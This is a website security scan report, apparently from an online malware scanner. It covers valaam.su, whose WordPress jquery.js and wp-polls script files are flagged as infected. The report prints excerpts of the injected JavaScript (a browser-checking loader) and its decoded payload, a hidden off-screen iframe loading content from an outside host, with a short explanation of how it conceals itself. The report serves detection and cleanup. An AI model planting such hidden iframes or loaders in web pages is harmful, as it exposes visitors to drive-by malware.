Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=valaam.su
Result: The website is marked by Google as suspicious: visiting this website may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.valaam.su/ | 200 OK Content-Length: 25070 Content-Type: text/html | clean |
http://www.valaam.su/wp-includes/js/jquery/jquery.js?ver=1.8.3 | 200 OK Content-Length: 94557 Content-Type: application/javascript | malicious |
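Malicious code - confirmed by antiviruses (see below). Excerpt (cut off by the report):
(function(){
function stripos (g_haystack, g_needle, g_offset) { var carpet = (g_haystack + '').toLowerCase(); var fulisca = (g_needle + '').toLowerCase(); var index = 0; if ((index = carpet.indexOf(fulisca, g_offset)) !== -1) { return index; } return false; } function CheckBrowser(){ var badbrowserlist = ['Chrome','Android']; var anuchbrow = false; for (var i in badbrowserlist) { if (stripos(navigator.userAgent, [...]
The visible part is a user-agent check against a list containing 'Chrome' and 'Android', served from the site's own copy of jquery.js; the remainder of the injected script is not shown here, so what the check gates cannot be confirmed from this excerpt.
Antivirus reports: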
| ||
http://www.valaam.su/wp-content/plugins/wp-polls/polls-js.dev.js | 200 OK Content-Length: 6529 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). Excerpt (the report shows the start of the injected script, then what appears to be the end of the original plugin file):
(function(){
function stripos (g_haystack, g_needle, g_offset) { var carpet = (g_haystack + '').toLowerCase(); var fulisca = (g_needle + '').toLowerCase(); var index = 0; if ((index = carpet.indexOf(fulisca, g_offset)) !== -1) { return index; } return false; } function CheckBrowser(){ var badbrowserlist = ['Chrome','Android']; var anuchbrow = false; for (var i in badbrowserlist) { if (stripos(navigator.userAgent, [...]
jQuery('#polls-' + poll_id).replaceWith(data); if(pollsL10n.show_loading) { jQuery('#polls-' + poll_id + '-loading').hide(); } if(pollsL10n.show_fading) { jQuery('#polls-' + poll_id).fadeTo('def', 1, function () { set_is_being_voted(false); }); } else { set_is_being_voted(false); } } function set_is_being_voted(voted_status) { is_being_voted = voted_status; }
Decoded script:
<iframe src="http://dokisjam.tdl-informatica.com.ar/cracker15.ficvali" style="position:absolute;left:-3000px;top:-3000px;" height="132" width="132"></iframe>
The decoded payload is a 132x132 iframe positioned off-screen (left and top at -3000px), so the visitor does not see it while the browser loads content from the third-party host. Because the injection sits in shared script files, pages listed as clean in this table may still load it if they include those scripts.
Antivirus reports:
| ||
http://www.valaam.su/category/vesti/ | 200 OK Content-Length: 12375 Content-Type: text/html | clean |
http://www.valaam.su/category/history/ | 200 OK Content-Length: 13869 Content-Type: text/html | clean |
http://www.valaam.su/category/sights/ | 200 OK Content-Length: 12404 Content-Type: text/html | clean |
http://www.valaam.su/category/photo/ | 200 OK Content-Length: 20563 Content-Type: text/html | clean |
http://www.valaam.su/valaam_map/ | 200 OK Content-Length: 12388 Content-Type: text/html | clean |
http://www.valaam.su/advice/ | 200 OK Content-Length: 17217 Content-Type: text/html | clean |
http://www.valaam.su/history/4/ | 200 OK Content-Length: 17466 Content-Type: text/html | clean |
http://www.valaam.su/history/5/ | 200 OK Content-Length: 20182 Content-Type: text/html | clean |
http://www.valaam.su/history/6/ | 200 OK Content-Length: 21984 Content-Type: text/html | clean |
http://www.valaam.su/history/7/ | 200 OK Content-Length: 23405 Content-Type: text/html | clean |
http://www.valaam.su/history/8/ | 200 OK Content-Length: 15075 Content-Type: text/html | clean |
http://www.valaam.su/history/9/ | 200 OK Content-Length: 14256 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: valaam.su
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: valaam.su
Referer: http://www.google.com/search?q=valaam.su
Result:
The result is similar to the first query. No suspicious redirects were found.